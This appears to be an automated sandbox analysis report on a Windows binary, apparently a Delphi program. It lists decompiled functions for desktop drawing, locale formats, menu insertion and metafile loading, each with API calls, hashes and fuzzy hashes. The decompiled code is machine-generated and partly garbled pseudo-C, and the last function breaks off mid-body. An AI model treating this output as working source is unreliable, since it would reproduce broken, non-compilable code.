                                                                        • API String ID:
                                                                        • Opcode ID: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction ID: 5572a461d4d5c649957c28d46cd97aeae1e5ffce9261f6d8a18b716679afef8d
                                                                        • Opcode Fuzzy Hash: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction Fuzzy Hash: 9C517070204341AFC720EB69C845B6BBBF9AF4D304F06985EB9D6D7352C639E844CB25
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00437068, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 39%
                                                                        			E00437068(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x437183);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E0041FC84( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x43718a);
				return ReleaseDC(_v12, _v16);
			}



















                                                                        0x00437069
                                                                        0x0043706b
                                                                        0x00437071
                                                                        0x0043707d
                                                                        0x00437083
                                                                        0x00437093
                                                                        0x0043709a
                                                                        0x0043709b
                                                                        0x0043709c
                                                                        0x0043709d
                                                                        0x0043709e
                                                                        0x00437085
                                                                        0x00437085
                                                                        0x0043708c
                                                                        0x0043708d
                                                                        0x0043708e
                                                                        0x0043708f
                                                                        0x00437090
                                                                        0x00437090
                                                                        0x004370a4
                                                                        0x004370b7
                                                                        0x004370bc
                                                                        0x004370bd
                                                                        0x004370c2
                                                                        0x004370c5
                                                                        0x004370da
                                                                        0x004370e6
                                                                        0x004370ee
                                                                        0x004370fb
                                                                        0x0043711d
                                                                        0x0043713c
                                                                        0x00437156
                                                                        0x00437163
                                                                        0x0043716a
                                                                        0x0043716d
                                                                        0x00437170
                                                                        0x00437182

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0043709F
                                                                        • GetDCEx.USER32(?,00000000,00000402), ref: 004370B2
                                                                        • SelectObject.GDI32(?,00000000), ref: 004370D5
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004370FB
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043711D
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043713C
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00437156
                                                                        • SelectObject.GDI32(?,?), ref: 00437163
                                                                        • ReleaseDC.USER32 ref: 0043717D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$DesktopReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 1187665388-0
                                                                        • Opcode ID: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction ID: 771ec133291533bbbaf77add90e3910cc377049704c9dec5494c1e876cde8f30
                                                                        • Opcode Fuzzy Hash: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction Fuzzy Hash: 66310BB6A04219BFDB00DEADCC85DAFB7FCEF49704B014469B544F7281C679AD048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AFB0, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0040AFB0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b27b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AE3C();
				E00409A84(__ebx, __edi, __esi);
				_t196 =  *0x4967fc;
				if( *0x4967fc != 0) {
					E00409C5C(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E004099D4(_t43, 0, 0x14,  &_v20);
				E0040439C(0x496730, _v20);
				E004099D4(_t43, 0x40b290, 0x1b,  &_v24);
				 *0x496734 = E004087C0(0x40b290, 0, _t196);
				E004099D4(_t132, 0x40b290, 0x1c,  &_v28);
				 *0x496735 = E004087C0(0x40b290, 0, _t196);
				 *0x496736 = E00409A20(_t132, 0x2c, 0xf);
				 *0x496737 = E00409A20(_t132, 0x2e, 0xe);
				E004099D4(_t132, 0x40b290, 0x19,  &_v32);
				 *0x496738 = E004087C0(0x40b290, 0, _t196);
				 *0x496739 = E00409A20(_t132, 0x2f, 0x1d);
				E004099D4(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409D0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E0040439C(0x49673c, _v36);
				E004099D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409D0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E0040439C(0x496740, _v44);
				 *0x496744 = E00409A20(_t132, 0x3a, 0x1e);
				E004099D4(_t132, 0x40b2c4, 0x28,  &_v52);
				E0040439C(0x496748, _v52);
				E004099D4(_t132, 0x40b2d0, 0x29,  &_v56);
				E0040439C(0x49674c, _v56);
				E00404348( &_v12);
				E00404348( &_v16);
				E004099D4(_t132, 0x40b290, 0x25,  &_v60);
				_t104 = E004087C0(0x40b290, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043E0( &_v8, 0x40b2e8);
				} else {
					E004043E0( &_v8, 0x40b2dc);
				}
				E004099D4(_t132, 0x40b290, 0x23,  &_v64);
				_t111 = E004087C0(0x40b290, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E004099D4(_t132, 0x40b290, 0x1005,  &_v68);
					if(E004087C0(0x40b290, 0, _t198) != 0) {
						E004043E0( &_v12, 0x40b304);
					} else {
						E004043E0( &_v16, 0x40b2f4);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004046C0();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E004046C0();
				 *0x4967fe = E00409A20(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B282);
				return E0040436C( &_v68, 0x10);
			}

























                                                                        0x0040afb0
                                                                        0x0040afb0
                                                                        0x0040afb1
                                                                        0x0040afb3
                                                                        0x0040afb8
                                                                        0x0040afb8
                                                                        0x0040afba
                                                                        0x0040afbc
                                                                        0x0040afbc
                                                                        0x0040afbf
                                                                        0x0040afc2
                                                                        0x0040afc3
                                                                        0x0040afc8
                                                                        0x0040afcb
                                                                        0x0040afce
                                                                        0x0040afd3
                                                                        0x0040afd8
                                                                        0x0040afdf
                                                                        0x0040afe1
                                                                        0x0040afe1
                                                                        0x0040afeb
                                                                        0x0040affa
                                                                        0x0040b007
                                                                        0x0040b01c
                                                                        0x0040b02b
                                                                        0x0040b040
                                                                        0x0040b04f
                                                                        0x0040b062
                                                                        0x0040b075
                                                                        0x0040b08a
                                                                        0x0040b099
                                                                        0x0040b0ac
                                                                        0x0040b0c1
                                                                        0x0040b0cc
                                                                        0x0040b0d9
                                                                        0x0040b0ee
                                                                        0x0040b0f9
                                                                        0x0040b106
                                                                        0x0040b119
                                                                        0x0040b12e
                                                                        0x0040b13b
                                                                        0x0040b150
                                                                        0x0040b15d
                                                                        0x0040b165
                                                                        0x0040b16d
                                                                        0x0040b182
                                                                        0x0040b18c
                                                                        0x0040b191
                                                                        0x0040b193
                                                                        0x0040b1ac
                                                                        0x0040b195
                                                                        0x0040b19d
                                                                        0x0040b19d
                                                                        0x0040b1c1
                                                                        0x0040b1cb
                                                                        0x0040b1d0
                                                                        0x0040b1d2
                                                                        0x0040b1e4
                                                                        0x0040b1f5
                                                                        0x0040b20e
                                                                        0x0040b1f7
                                                                        0x0040b1ff
                                                                        0x0040b1ff
                                                                        0x0040b1f5
                                                                        0x0040b213
                                                                        0x0040b216
                                                                        0x0040b219
                                                                        0x0040b21e
                                                                        0x0040b22b
                                                                        0x0040b230
                                                                        0x0040b233
                                                                        0x0040b236
                                                                        0x0040b23b
                                                                        0x0040b248
                                                                        0x0040b25b
                                                                        0x0040b262
                                                                        0x0040b265
                                                                        0x0040b268
                                                                        0x0040b27a

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,0040B27B,?,?,00000000,00000000), ref: 0040AFE6
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction ID: ab645d97e84e0256c4c4970a1fb5dcc84b1706c9c56c8f89f877431b82433d7f
                                                                        • Opcode Fuzzy Hash: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction Fuzzy Hash: 28613A707001489BDB04EBE9E881A9F77A6DB98308F20947FA501BB3D6DA3CDD05879C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00446428, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00446428(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x446683);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44668a);
					E00404348( &_v68);
					return E00404348( &_v12);
				}
				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E00448264(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x47aa7c + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0047AA70 |  *0x0047AA60 |  *0x0047AA68 | 0x00000400;
							_t103 = E00448264(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
							} else {
								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044692C(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00448820(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00447E3C(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x47aab0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0047AAA8 |  *0x0047AA84 |  *0x0047AAB8 |  *0x0047AAC0;
							_v61.fState =  *0x0047AA90 |  *0x0047AAA0 |  *0x0047AA98;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047F8(_v12);
							if(E00448264(_t154) > 0) {
								_v61.hSubMenu = E0044692C(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44669c);
						E00445A8C( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E004046C0();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x44531c; // 0x445368
					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044692C(_t154);
				goto L8;
			}





















                                                                        0x00446428
                                                                        0x00446433
                                                                        0x00446436
                                                                        0x00446439
                                                                        0x0044643c
                                                                        0x0044643e
                                                                        0x00446442
                                                                        0x00446443
                                                                        0x00446448
                                                                        0x0044644b
                                                                        0x00446452
                                                                        0x00446665
                                                                        0x00446667
                                                                        0x0044666a
                                                                        0x0044666d
                                                                        0x00446675
                                                                        0x00446682
                                                                        0x00446682
                                                                        0x0044645e
                                                                        0x0044646c
                                                                        0x0044647a
                                                                        0x0044647f
                                                                        0x004464c4
                                                                        0x004464d2
                                                                        0x0044661e
                                                                        0x00446626
                                                                        0x0044662b
                                                                        0x0044662d
                                                                        0x00446660
                                                                        0x0044662f
                                                                        0x00446632
                                                                        0x00446647
                                                                        0x00446647
                                                                        0x00000000
                                                                        0x0044662d
                                                                        0x004464d8
                                                                        0x004464df
                                                                        0x004464ed
                                                                        0x004464f1
                                                                        0x00446508
                                                                        0x00446516
                                                                        0x00446516
                                                                        0x00000000
                                                                        0x00446516
                                                                        0x00446512
                                                                        0x00446514
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044651a
                                                                        0x0044651a
                                                                        0x0044651a
                                                                        0x0044651c
                                                                        0x0044651c
                                                                        0x0044656b
                                                                        0x00446592
                                                                        0x00446599
                                                                        0x0044659e
                                                                        0x004465a3
                                                                        0x004465a8
                                                                        0x004465b3
                                                                        0x004465bf
                                                                        0x004465c8
                                                                        0x004465c8
                                                                        0x004465d4
                                                                        0x00000000
                                                                        0x004465d4
                                                                        0x004464f1
                                                                        0x00446481
                                                                        0x00446484
                                                                        0x00446486
                                                                        0x004464a0
                                                                        0x004464a0
                                                                        0x004464a3
                                                                        0x004464af
                                                                        0x004464b4
                                                                        0x004464bf
                                                                        0x00000000
                                                                        0x004464bf
                                                                        0x00446488
                                                                        0x0044648c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446491
                                                                        0x00446497
                                                                        0x0044649c
                                                                        0x0044649e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044649e
                                                                        0x00446475
                                                                        0x00000000

                                                                        APIs
                                                                        • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004465D4
                                                                        • GetVersion.KERNEL32(00000000,00446683), ref: 004464C4
                                                                          • Part of subcall function 0044692C: CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$CreateInsertItemPopupVersion
                                                                        • String ID: ,$?$hSD
                                                                        • API String ID: 133695497-2744044814
                                                                        • Opcode ID: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction ID: c1f226bee94c505ff5879a5e45d3f70f72b48b4718122b33157cbbefa9e75370
                                                                        • Opcode Fuzzy Hash: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction Fuzzy Hash: BD611370A002409BEB10EF79DC816AE7BF5BF4A308F06457AE944E7396D738D845CB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456720, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetActiveWindow.USER32 ref: 00456733
                                                                        • GetWindowRect.USER32 ref: 0045678D
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004567C5
                                                                        • MessageBoxA.USER32 ref: 00456806
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045687C,?,00000000,00456875), ref: 00456856
                                                                        • SetActiveWindow.USER32(?,0045687C,?,00000000,00456875), ref: 00456867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Active$MessageRect
                                                                        • String ID: (
                                                                        • API String ID: 3147912190-3887548279
                                                                        • Opcode ID: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction ID: 7cbad7be9c4b48523c1cfc1a11d04e08d9ad09d2673b50e57f39b10a150b3f7a
                                                                        • Opcode Fuzzy Hash: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction Fuzzy Hash: BE415EB5E00104AFDB04DFA9CD81FAE77F9EB48304F55446AF900EB392DA74AD008B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422CEA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00422CEA(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B88(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
					E00420A20();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420A20();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420A20();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E62);
				return E00402774(_v16);
			}


























                                                                        0x00422ced
                                                                        0x00422cef
                                                                        0x00422cf8
                                                                        0x00422cfb
                                                                        0x00422cfe
                                                                        0x00422d02
                                                                        0x00422d14
                                                                        0x00422d1e
                                                                        0x00422d2e
                                                                        0x00422d2e
                                                                        0x00422d33
                                                                        0x00422d3f
                                                                        0x00422d42
                                                                        0x00422d50
                                                                        0x00422d5e
                                                                        0x00422d68
                                                                        0x00422d71
                                                                        0x00422d73
                                                                        0x00422d73
                                                                        0x00422d93
                                                                        0x00422db0
                                                                        0x00422db3
                                                                        0x00422dbc
                                                                        0x00422dc1
                                                                        0x00422dc6
                                                                        0x00422ddc
                                                                        0x00422dde
                                                                        0x00422de3
                                                                        0x00422de5
                                                                        0x00422de5
                                                                        0x00422df7
                                                                        0x00422dfc
                                                                        0x00422e06
                                                                        0x00422e0c
                                                                        0x00422e11
                                                                        0x00422e18
                                                                        0x00422e30
                                                                        0x00422e32
                                                                        0x00422e37
                                                                        0x00422e39
                                                                        0x00422e39
                                                                        0x00422e3e
                                                                        0x00422e44
                                                                        0x00422e47
                                                                        0x00422e4a
                                                                        0x00422e5a

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction ID: fb0f5a08ef807ff7da08fe929f8a7a8f4baacde4112ddcaebb4220c4adbca4e0
                                                                        • Opcode Fuzzy Hash: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction Fuzzy Hash: CC412F75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422CEC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00422CEC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B88(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
					E00420A20();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
